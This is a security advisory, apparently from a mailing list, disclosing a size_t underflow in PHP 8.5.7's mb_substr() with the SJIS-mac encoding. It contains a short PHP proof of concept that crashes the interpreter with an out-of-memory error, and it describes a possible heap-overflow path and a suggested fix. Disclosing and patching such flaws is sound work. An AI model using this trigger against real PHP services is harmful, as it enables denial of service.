From: Khashayar Fereidani <info () fereidani com>
Date: Fri, 19 Jun 2026 09:53:43 +0330
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact
## Description
The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately skips the early empty-string return guard for the `SJIS-mac`
encoding when `from >= in_len`. As a result, execution falls through to
`mb_get_substr_slow()`, which calls `mb_convert_buf_init(&buf, MIN(len,
in_len - from), ...);`. When `from > in_len`, the expression `in_len -
from` underflows `size_t` and yields an allocation size close to 2^64
bytes. This leads to an immediate Out-Of-Memory (OOM) fatal error.
Furthermore, if `_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`,
the allocation could be tiny while the buffer limit is still computed
from the underflowed size, resulting in a heap buffer overflow when
subsequent codepoints are decoded and written.
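The underflow can be reproduced outside PHP. The following is a minimal sketch, not code from php-src: `SKETCH_MIN` and `sketch_initsize` are hypothetical names that only mirror the size expression quoted above, assuming `len`, `in_len` and `from` are all `size_t`.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the MIN() macro used in the quoted call. */
#define SKETCH_MIN(a, b) ((a) < (b) ? (a) : (b))

/*
 * Mirrors the size argument passed to mb_convert_buf_init():
 * MIN(len, in_len - from), with no check that from <= in_len.
 * Unsigned subtraction wraps modulo 2^N instead of going negative.
 */
size_t sketch_initsize(size_t len, size_t in_len, size_t from)
{
    return SKETCH_MIN(len, in_len - from);
}
```

With `in_len = 3` and `from = 1000000`, the subtraction wraps to `SIZE_MAX - 999996`. If `len` is at least that large, `MIN()` does not reduce the value.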
## Proof of concept
```php
<?php
/*
 * PoC: mb_substr() 'SJIS-mac' size_t underflow
 * File: ext/mbstring/mbstring.c mb_get_substr() (~L2129) +
 *       mb_get_substr_slow() (~L2102)
 *
 * mb_get_substr() deliberately skips the early "return empty" guard
 * for SJIS-mac:
 *
 *   if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
 *       return zend_empty_string; // <-- sjis_mac bypasses this when from >= in_len
 *   }
 *
 * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
 * mb_get_substr_slow(), whose first line is:
 *
 *   mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
 *
 * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
 * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
 *
 * Two outcomes, both wrong (correct result is the empty string):
 * (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
 *     (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
 * (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
 *     _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
 *     while buf->limit = out + initsize stays wild -> a subsequent write of
 *     decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
 *     needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
 *     from < codepoint_count while from > byte_count. Worth upstream review.)
 */
echo "PHP ", PHP_VERSION, " sjis_mac available: ",
    (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
/* control: a normal encoding with from > strlen returns "" cleanly */
echo "UTF-8, from=10 > strlen('abc'): -> ";
var_dump(@mb_substr("abc", 10, null, "UTF-8"));
/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
 * The "tried to allocate 18...644 bytes" figure is (size_t)(3 - 1000000) plus
 * the _ZSTR_STRUCT_SIZE() overhead (25 bytes, assuming a 64-bit build). */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");
echo "(if you see this line, the fatal error above was caught/suppressed)\n";
```
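The two outcomes described in the PoC comment can be checked with plain arithmetic. This sketch is illustrative only: `sketch_alloc_size` and `SKETCH_ZSTR_OVERHEAD` are hypothetical names, and the 25-byte overhead (a 24-byte string header plus a trailing NUL) is an assumption about a 64-bit build. It is at least consistent with the byte count in the fatal error quoted above.

```c
#include <stddef.h>
#include <stdint.h>

/* ASSUMPTION: header (24 bytes) + trailing NUL (1 byte) on a 64-bit build. */
#define SKETCH_ZSTR_OVERHEAD ((size_t)25)

/*
 * Models the size handed to the allocator when length is omitted:
 * first in_len - from (wraps when from > in_len), then the string
 * struct overhead is added, which can wrap a second time.
 */
size_t sketch_alloc_size(size_t in_len, size_t from)
{
    size_t initsize = in_len - from;        /* first wrap: near 2^N */
    return initsize + SKETCH_ZSTR_OVERHEAD; /* possible second wrap */
}
```

Under that assumption, `sketch_alloc_size(3, 1000000)` is 18446744073708551644 on a 64-bit target, which matches outcome (A). `sketch_alloc_size(3, 4)` wraps to 24, which illustrates the tiny allocation of outcome (B). In this model the second wrap occurs only when `from` exceeds `in_len` by 1 to 25.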
## Impact
An attacker who can cause `mb_substr()` to be called with `from >
in_len` and the 'SJIS-mac' encoding can trigger a `size_t`
underflow. This reliably causes an Out-Of-Memory (OOM) fatal
error and therefore a Denial of Service. Depending on the
environment, it might in theory also cause a heap buffer overflow.
## Solution
Tighten the checks in `mb_get_substr()` and
`mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
`in_len - from` should be bounds-checked so that, when `from >
in_len`, the function either returns early or clamps the result to
zero, avoiding the underflow when the string buffer is initialized.
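One way to express the clamp is sketched below. This is not the upstream patch: `sketch_safe_initsize` is a hypothetical helper, and it assumes the value is only an initial capacity hint for a conversion buffer that can grow as codepoints are written.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical replacement for MIN(len, in_len - from):
 * compare before subtracting so the unsigned subtraction cannot wrap.
 */
size_t sketch_safe_initsize(size_t len, size_t in_len, size_t from)
{
    if (from >= in_len) {
        return 0; /* nothing guaranteed to remain; start with an empty hint */
    }
    size_t remaining = in_len - from; /* safe: from < in_len here */
    return len < remaining ? len : remaining;
}
```

Clamping the hint rather than returning early keeps the SJIS-mac special case intact, where `from` counts codepoints and may legitimately exceed the byte length. Whether that is the right trade-off is for upstream to decide.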